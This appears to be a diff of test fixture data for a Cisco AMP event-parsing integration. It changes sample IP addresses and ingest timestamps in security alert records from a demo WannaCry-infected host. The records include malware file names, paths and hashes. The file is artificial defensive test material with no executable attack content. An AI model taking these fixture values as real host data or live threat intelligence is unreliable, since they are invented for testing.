+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
 "code": "2164260880",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -3087,7 +3087,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -3150,7 +3150,7 @@
 "be5d6279874da315e3080b06083757aad9b32c23"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -3167,8 +3167,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025293456Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":580000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\",\"sha1\":\"be5d6279874da315e3080b06083757aad9b32c23\",\"md5\":\"8495400f199ac77853c53b5a3f278f3e\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}",
+ "ingested": "2021-12-09T13:35:39.764004700Z",
+ "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":580000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\",\"sha1\":\"be5d6279874da315e3080b06083757aad9b32c23\",\"md5\":\"8495400f199ac77853c53b5a3f278f3e\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", 
@@ -3190,7 +3190,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "parent": {
@@ -3253,7 +3253,7 @@
 "47a9ad4125b6bd7c55e4e7da251e23f089407b8f"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -3270,8 +3270,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025295717Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":564000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\",\"sha1\":\"47a9ad4125b6bd7c55e4e7da251e23f089407b8f\",\"md5\":\"4fef5e34143e646dbf9907c4374276f5\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}", + "ingested": "2021-12-09T13:35:39.764011100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":564000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\",\"sha1\":\"47a9ad4125b6bd7c55e4e7da251e23f089407b8f\",\"md5\":\"4fef5e34143e646dbf9907c4374276f5\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", 
@@ -3293,7 +3293,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3338,7 +3338,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3348,8 +3348,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025298010Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764074200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -3369,7 +3369,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3410,7 +3410,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3420,8 +3420,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025300329Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:39.764078800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -3441,7 +3441,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3491,7 +3491,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3508,8 +3508,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025302577Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764083500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3531,7 +3531,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3581,7 +3581,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3598,8 +3598,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025304802Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":783000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764088400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":783000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3621,7 +3621,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3678,7 +3678,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3695,8 +3695,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025307041Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":727000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", + "ingested": "2021-12-09T13:35:39.764094300Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":727000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc